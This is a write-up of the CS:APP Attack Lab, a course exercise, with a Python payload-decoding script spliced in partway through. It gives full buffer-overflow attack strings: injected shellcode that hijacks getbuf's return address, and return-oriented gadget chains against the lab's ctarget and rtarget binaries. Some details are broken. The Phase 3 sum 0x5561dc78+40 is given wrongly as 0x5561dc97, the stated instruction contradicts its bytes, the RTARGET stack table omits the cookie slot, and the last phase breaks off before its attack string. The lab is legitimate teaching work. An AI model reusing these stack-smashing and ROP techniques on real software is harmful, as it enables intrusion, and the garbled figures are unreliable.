Read the lab manual and start the Attack Lab.
CTARGET Phase 1
The first attack phase requires calling the existing function touch1. This is simple: you must overwrite the return address on the stack with the starting address of touch1.
First, use gdb to debug ctarget and disassemble the assembly code of getbuf:
CTARGET Phase 2
Phase 2 requires injecting a small piece of code so that the function touch2(unsigned) is called with an argument. First of all, if you read the touch2 source in the lab manual, you need to determine your cookie:
First, collect the relevant information:
    Stack address:           0x5561dc78
    touch2 function address: 0x00000000004017ec
    Cookie:                  0x59b997fa
Then start writing the injected code. The goal of this code is to call touch2 with the cookie as its argument:
    fun2:
        movl $0x59b997fa,%edi
        pushq $0x4017ec
        ret
Assemble it into an object file, then use objdump -d to disassemble it into phase2.txt:
    phase2.o:     file format elf64-x86-64

    Disassembly of section .text:

    0000000000000000 <fun2>:
       0:   bf fa 97 b9 59          mov    $0x59b997fa,%edi
       5:   68 ec 17 40 00          pushq  $0x4017ec
       a:   c3                      retq
Keep the byte encodings, pad them out to 40 bytes, then append the address to return to (the start of the buffer on the stack, so that the injected code runs), giving phase2.txt:
    bf fa 97 b9 59          /* movl $0x59b997fa,%edi */
    68 ec 17 40 00          /* pushq $0x4017ec */
    c3                      /* retq */
    ef ef ef ef ef ef ef ef ef ef ef ef ef ef ef ef ef ef ef ef ef ef ef ef ef ef ef ef ef   /* padding, 29 bytes */
    78 dc 61 55 00 00 00 00 /* new return address: start of the injected code */
Enter the test command:
PS: it is also possible to write the injected program as follows:
    fun2:
        movl $0x59b997fa,%edi
        subq $8,%rsp
        movq $0x4017ec,(%rsp)
        ret
CTARGET Phase 3
Read the handout first. It emphasizes that the stack frame allocated by getbuf may be overwritten by the hexmatch function and the strncmp function. So we choose the parent stack frame of getbuf, that is, the stack frame of the test function, to store our string. In any case we will not return to the test function; the program will finish execution inside the body of touch3.
First of all, we determined the stack frame address as 0x5561dc78 in the previous phase. Disassembling touch3 shows that its starting address is 0x4018fa. Since we decided to store the string in the parent stack frame, the distance between the string and the starting address of our stack frame is 40 bytes (from the previous phase we know that getbuf allocated a 40-byte stack frame). Therefore the starting address of the string is 0x5561dc78+40Bytes=0x5561dc97.
So let's write the injected code:
    movq $0x5561dc97,%rdi
    pushq $0x4018fa
    retq
After assembling, fill in the 27-byte placeholder between the code and the return address, and append the ASCII bytes of the string at the end:
    48 c7 c7 a8 dc 61 55       /* movq $0x5561dca8,%rdi (the immediate encoded by these bytes) */
    68 fa 18 40 00             /* pushq $0x4018fa */
    c3                         /* retq */
    ef ef ef ef ef ef ef ef ef ef ef ef ef ef ef ef ef ef ef ef ef ef ef ef ef ef ef   /* padding, 27 bytes in total */
    78 dc 61 55 00 00 00 00    /* new return address: start of the code area */
    35 39 62 39 39 37 66 61 00 /* ASCII bytes of the string "59b997fa"; this string lands in test's stack frame */
Run the program: the test passes.
RTARGET Phase 2
RTARGET Phase 2 requires finding, in the existing code, the gadgets the attack needs in order to repeat the previous CTARGET Phase 2 exercise. First, in gdb ./rtarget, type the command disas /r start_farm,mid_farm to view all the instructions and their encodings between start_farm and mid_farm:
Looking at the disassembly, you need to find a popq instruction and a movq instruction, so you split them into two gadgets. Each of these instructions must be followed directly by the 0xc3 (retq) return instruction, possibly with 0x90 (nop) instructions in between.
Let's find Gadget 1 first. The encoding of the popq instruction is 0x58-0x5f. Looking at the figure above, the encoding starting at address 0x4019cc meets the requirements:
58 90 c3: these three bytes are the instructions popq %rax, nop and retq respectively.
Now Gadget 2. The encoding of the movq instruction starts with 0x48 0x89, so it is quickly located at starting address 0x4019a2. There are four bytes at this address, 48 89 c7 c3, which encode the instructions movq %rax,%rdi and retq, exactly meeting the requirements.
A rough sketch of the stack layout:
| %rsp+32 | touch2 function start address | 0x4017ec |
| %rsp+24 | Gadget 2 start address        | 0x4019a2 |
| %rsp+8  | Gadget 1 start address        | 0x4019cc |
Therefore, the attack string is constructed as follows:
    ef ef ef ef ef ef ef ef ef ef ef ef ef ef ef ef
    ef ef ef ef ef ef ef ef ef ef ef ef ef ef ef ef
    ef ef ef ef ef ef ef ef
    cc 19 40 00 00 00 00 00 fa 97 b9 59 00 00 00 00
    a2 19 40 00 00 00 00 00 ec 17 40 00 00 00 00 00
Run the program: it passes:
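The safest way to check a payload like the ones above (CTARGET Phase 2 and 3, and the RTARGET Phase 2 chain) is to decode the bytes back rather than trust the addresses computed by hand. The script below is an added example, not part of the original write-up or of the lab: it parses hex2raw-style text (hex byte pairs with /* */ comments), splits off the 40-byte buffer, decodes the handful of instruction encodings used in this write-up (movl $imm,%edi; pushq $imm; movq $imm,%rdi; retq; nop) to recover their immediates, reads the overwritten return address and the 8-byte stack words after it in little-endian order, and labels any word that matches an address or value the write-up states. The SYMBOLS table and BUF_SIZE are copied from the page; everything else (function names, the decoder, the sample payload strings) is assumed for illustration. Note that decoding the Phase 3 bytes 48 c7 c7 a8 dc 61 55 yields the immediate 0x5561dca8, i.e. the buffer start plus 40 bytes of buffer plus the 8-byte return-address slot.

```python
import re
import struct

# Addresses and values stated in the write-up; labels are for display only.
SYMBOLS = {
    0x4017ec: "touch2",
    0x4018fa: "touch3",
    0x4019cc: "gadget 1 (popq %rax; nop; retq)",
    0x4019a2: "gadget 2 (movq %rax,%rdi; retq)",
    0x5561dc78: "start of getbuf's buffer",
    0x59b997fa: "cookie",
}
BUF_SIZE = 40                 # size of getbuf's buffer, per the write-up
MASK64 = (1 << 64) - 1

# Payloads copied from the write-up, in hex2raw format (constructed strings).
CTARGET_PHASE2 = "bf fa 97 b9 59 68 ec 17 40 00 c3 " + "ef " * 29 + "78 dc 61 55 00 00 00 00"
CTARGET_PHASE3 = ("48 c7 c7 a8 dc 61 55 68 fa 18 40 00 c3 " + "ef " * 27
                  + "78 dc 61 55 00 00 00 00 35 39 62 39 39 37 66 61 00")
RTARGET_PHASE2 = ("ef " * 40 + "cc 19 40 00 00 00 00 00 fa 97 b9 59 00 00 00 00 "
                  "a2 19 40 00 00 00 00 00 ec 17 40 00 00 00 00 00")


def parse_hex2raw(text):
    """Convert hex2raw-style input (hex byte pairs, /* ... */ comments) to bytes."""
    text = re.sub(r"/\*.*?\*/", " ", text, flags=re.S)
    return bytes(int(tok, 16) for tok in text.split())


def decode_injected_code(code):
    """Decode only the x86-64 encodings used in the write-up's injected code.

    Returns (instructions, bytes_consumed). Decoding stops at the first byte
    that is not one of these encodings, which is where the padding begins.
    """
    insns, i = [], 0
    while i < len(code):
        b = code[i]
        if b == 0xC3:                                              # retq
            insns.append("retq")
            i += 1
        elif b == 0x90:                                            # nop
            insns.append("nop")
            i += 1
        elif b == 0xBF and i + 5 <= len(code):                     # movl $imm32,%edi
            (imm,) = struct.unpack_from("<I", code, i + 1)
            insns.append(f"movl ${imm:#x},%edi")
            i += 5
        elif b == 0x68 and i + 5 <= len(code):                     # pushq $imm32 (sign-extended)
            (imm,) = struct.unpack_from("<i", code, i + 1)
            insns.append(f"pushq ${imm & MASK64:#x}")
            i += 5
        elif code[i:i + 3] == b"\x48\xc7\xc7" and i + 7 <= len(code):  # movq $imm32,%rdi
            (imm,) = struct.unpack_from("<i", code, i + 3)
            insns.append(f"movq ${imm & MASK64:#x},%rdi")
            i += 7
        else:
            break
    return insns, i


def describe_payload(text, buf_size=BUF_SIZE):
    """Split a payload into buffer contents, the overwritten return address and
    the 8-byte stack words after it, labelling values the write-up names."""
    raw = parse_hex2raw(text)
    if len(raw) < buf_size + 8:
        raise ValueError("payload does not reach the saved return address")
    buf, rest = raw[:buf_size], raw[buf_size:]
    insns, code_len = decode_injected_code(buf)
    ret_addr = struct.unpack_from("<Q", rest)[0]        # little-endian, as on the stack
    after = rest[8:]
    # A NUL-terminated run of printable ASCII after the return address is
    # reported as a C string (the touch3 case).
    cstring = None
    if 0 in after:
        s = after[:after.index(0)]
        if s and all(0x20 <= c < 0x7F for c in s):
            cstring = s.decode("ascii")
    words = [struct.unpack_from("<Q", after, o)[0] for o in range(0, len(after) - 7, 8)]
    return {
        "code": insns,
        "padding": buf_size - code_len,
        "return_address": ret_addr,
        "return_target": SYMBOLS.get(ret_addr, "unknown"),
        "stack_words": [(w, SYMBOLS.get(w, "data")) for w in words],
        "string": cstring,
    }


if __name__ == "__main__":
    for name, payload in [("ctarget phase 2", CTARGET_PHASE2),
                          ("ctarget phase 3", CTARGET_PHASE3),
                          ("rtarget phase 2", RTARGET_PHASE2)]:
        info = describe_payload(payload)
        print(f"== {name}: {len(parse_hex2raw(payload))} bytes")
        print("  injected code :", info["code"] or "(none, ROP only)")
        print("  padding bytes :", info["padding"])
        print(f"  return address: {info['return_address']:#x} -> {info['return_target']}")
        for w, label in info["stack_words"]:
            print(f"  stack word    : {w:#018x}  {label}")
        if info["string"]:
            print("  string        :", info["string"])
```

Because the decoder stops at the first byte it does not recognise, the padding count it reports is exactly the number of filler bytes between the injected code and the return-address slot, which is the figure the write-up works out by hand for each phase.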
RTARGET Phase 3
This phase is similar to RTARGET Phase 2: it also requires combining existing code to achieve what CTARGET Phase 3 did. First, disassemble all the instructions from start_farm to end_farm, then mark all the usable instructions according to the figure in the lab manual (as shown below):
                      : b8 01 00 00 00        mov    $0x1,%eax
    0x0000000000401999: c3                    retq
    0x000000000040199a: b8 fb 78 90 90        mov    $0x909078fb,%eax
    0x000000000040199f: c3                    retq
    0x00000000004019a0: 8d 87 48 89 c7 c3     lea    -0x3c3876b8(%rdi),%eax
    0x00000000004019a6: c3                    retq
    0x00000000004019a7: 8d 87 51 73 58 90     lea    -0x6fa78caf(%rdi),%eax   // 58 90 c3: popq %rax; nop; ret
    0x00000000004019ad: c3                    retq
    0x00000000004019ae: c7 07 48 89 c7 c7     movl   $0xc7c78948,(%rdi)
    0x00000000004019b4: c3                    retq
    0x00000000004019b5: c7 07 54 c2 58 92     movl   $0x9258c254,(%rdi)
    0x00000000004019bb: c3                    retq
    0x00000000004019bc: c7 07 63 48 8d c7     movl   $0xc78d4863,(%rdi)
    0x00000000004019c2: c3                    retq
    0x00000000004019c3: c7 07 48 89 c7 90     movl   $0x90c78948,(%rdi)      // 48 89 c7: movq %rax,%rdi; 89 c7: movl %eax,%edi; 90: nop
    0x00000000004019c9: c3                    retq
    0x00000000004019ca: b8 29 58 90 c3        mov    $0xc3905829,%eax
    0x00000000004019cf: c3                    retq
    0x00000000004019d0: b8 01 00 00 00        mov    $0x1,%eax
    0x00000000004019d5: c3                    retq
    0x00000000004019d6: 48 8d 04 37           lea    (%rdi,%rsi,1),%rax
    0x00000000004019da: c3                    retq
    0x00000000004019db: b8 5c 89 c2 90        mov    $0x90c2895c,%eax        // 89 c2 90: movl %eax,%edx; nop
    0x00000000004019e0: c3                    retq
    0x00000000004019e1: c7 07 99 d1 90 90     movl   $0x9090d199,(%rdi)
    0x00000000004019e7: c3                    retq
    0x00000000004019e8: 8d 87 89 ce 78 c9     lea    -0x36873177(%rdi),%eax
    0x00000000004019ee: c3                    retq
    0x00000000004019ef: 8d 87 8d d1 20 db     lea    -0x24df2e73(%rdi),%eax
    0x00000000004019f5: c3                    retq
    0x00000000004019f6: b8 89 d1 48 c0        mov    $0xc048d189,%eax
    0x00000000004019fb: c3                    retq
    0x00000000004019fc: c7 07 81 d1 84 c0     movl   $0xc084d181,(%rdi)
    0x0000000000401a02: c3                    retq
    0x0000000000401a03: 8d 87 41 48 89 e0     lea    -0x1f76b7bf(%rdi),%eax   // 48 89 e0: movq %rsp,%rax
    0x0000000000401a09: c3                    retq
    0x0000000000401a0a: c7 07 88 c2 08 c9     movl   $0xc908c288,(%rdi)
    0x0000000000401a10: c3                    retq
    0x0000000000401a11: 8d 87 89 ce 90 90     lea    -0x6f6f3177(%rdi),%eax   // 89 ce 90 90: movl %ecx,%esi; nop; nop
    0x0000000000401a17: c3                    retq
    0x0000000000401a18: b8 48 89 e0 c1        mov    $0xc1e08948,%eax
    0x0000000000401a1d: c3                    retq
    0x0000000000401a1e: 8d 87 89 c2 00 c9     lea    -0x36ff3d77(%rdi),%eax
    0x0000000000401a24: c3                    retq
    0x0000000000401a25: 8d 87 89 ce 38 c0     lea    -0x3fc73177(%rdi),%eax   // 89 ce 38 c0: movl %ecx,%esi; cmpb %al,%al (cmpb has no effect on the program here, so it is equivalent to a nop)
    0x0000000000401a2b: c3                    retq
    0x0000000000401a2c: c7 07 81 ce 08 db     movl   $0xdb08ce81,(%rdi)
    0x0000000000401a32: c3                    retq
    0x0000000000401a33: b8 89 d1 38 c9        mov    $0xc938d189,%eax        // 89 d1 38 c9: movl %edx,%ecx; cmpb %cl,%cl (cmpb is equivalent to a nop here)
    0x0000000000401a38: c3                    retq
    0x0000000000401a39: 8d 87 c8 89 e0 c3     lea    -0x3c1f7638(%rdi),%eax
    0x0000000000401a3f: c3                    retq
    0x0000000000401a40: 8d 87 89 c2 84 c0     lea    -0x3f7b3d77(%rdi),%eax   // 89 c2 84 c0: movl %eax,%edx; testb %al,%al (testb has no effect on the program here, so it is equivalent to a nop)
    0x0000000000401a46: c3                    retq
    0x0000000000401a47: 8d 87 48 89 e0 c7     lea    -0x381f76b8(%rdi),%eax
    0x0000000000401a4d: c3                    retq
    0x0000000000401a4e: b8 99 d1 08 d2        mov    $0xd208d199,%eax
    0x0000000000401a53: c3                    retq
    0x0000000000401a54: b8 89 c2 c4 c9        mov    $0xc9c4c289,%eax
    0x0000000000401a59: c3                    retq
    0x0000000000401a5a: c7 07 48 89 e0 91     movl   $0x91e08948,(%rdi)
    0x0000000000401a60: c3                    retq
    0x0000000000401a61: 8d 87 89 ce 92 c3     lea    -0x3c6d3177(%rdi),%eax
    0x0000000000401a67: c3                    retq
    0x0000000000401a68: b8 89 d1 08 db        mov    $0xdb08d189,%eax
    0x0000000000401a6d: c3                    retq
    0x0000000000401a6e: c7 07 89 d1 91 c3     movl   $0xc391d189,(%rdi)
    0x0000000000401a74: c3                    retq
    0x0000000000401a75: c7 07 81 c2 38 d2     movl   $0xd238c281,(%rdi)
    0x0000000000401a7b: c3                    retq
    0x0000000000401a7c: c7 07 09 ce 08 c9     movl   $0xc908ce09,(%rdi)
    0x0000000000401a82: c3                    retq
    0x0000000000401a83: 8d 87 08 89 e0 90     lea    -0x6f1f76f8(%rdi),%eax
    0x0000000000401a89: c3                    retq
    0x0000000000401a8a: 8d 87 89 c2 c7 3c     lea    0x3cc7c289(%rdi),%eax
    0x0000000000401a90: c3                    retq
    0x0000000000401a91: b8 88 ce 20 c0        mov    $0xc020ce88,%eax
    0x0000000000401a96: c3                    retq
    0x0000000000401a97: c7 07 48 89 e0 c2     movl   $0xc2e08948,(%rdi)
    0x0000000000401a9d: c3                    retq
    0x0000000000401a9e: 8d 87 89 c2 60 d2     lea    -0x2d9f3d77(%rdi),%eax
    0x0000000000401aa4: c3                    retq
    0x0000000000401aa5: b8 8d ce 20 d2        mov    $0xd220ce8d,%eax
    0x0000000000401aaa: c3                    retq
    0x0000000000401aab: c7 07 48 89 e0 90     movl   $0x90e08948,(%rdi)
    0x0000000000401ab1: c3                    retq
Then we can roughly determine the attack scheme: put the string on the stack. To find the location of the string, we need to take the position of the top of the stack and add the offset of the string within the stack to form the string's address. The plan is roughly as follows (A -> B means assign A to B): %rsp -> popq %rax; %eax -> %rdi+%rsi ->
The stack is laid out as follows (addresses grow upward):
| Actual string    | String content                |
| Function address | touch3 function start address |
| Offset value     | String offset                 |
Finally, you need to calculate the string offset. Note that when the first gadget, %rsp -> %rax, executes, %rsp actually points to the start address of the second gadget, so the offset of the string should be 9x8Byte=72Byte, that is, the hexadecimal value 0x48.
The attack string is constructed as follows (the first 40 ef bytes fill buf, followed by the corresponding components of the stack in reverse order; each gadget is represented by its address):